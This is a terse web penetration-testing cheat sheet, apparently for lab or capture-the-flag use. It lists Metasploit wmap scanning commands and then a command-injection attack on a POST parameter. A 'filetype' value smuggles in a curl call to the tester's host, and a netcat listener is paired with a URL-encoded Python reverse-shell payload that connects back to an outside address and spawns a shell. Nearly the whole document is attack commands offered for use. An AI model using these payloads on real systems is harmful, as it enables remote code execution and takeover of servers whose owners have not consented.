Technique

WEB - Vulnerability Check

1.0 Metasploit wmap

load wmap
wmap_sites -a http://vict.im
wmap_targets -d 0
wmap_run -t
wmap_run -e
wmap_vulns

2.0 POST RCE Check

2.1 Python HTTP Server

python -m http.server 80

2.2 Check RCE

photo=blah.jpg&filetype=png;curl+10.10.XX.XX/hfc84&dimensions=3000x2000

2.3 Listener

nc -nvlp 443

2.4 Python Reverse Shell

URL Encoding

Encode the string correctly: URL-Encoder

photo=blah.jpg&filetype=png%3bexport+RHOST%3d"10.10.XX.XX"%3bexport+RPORT%3d443%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

References

• IIS and Apache Check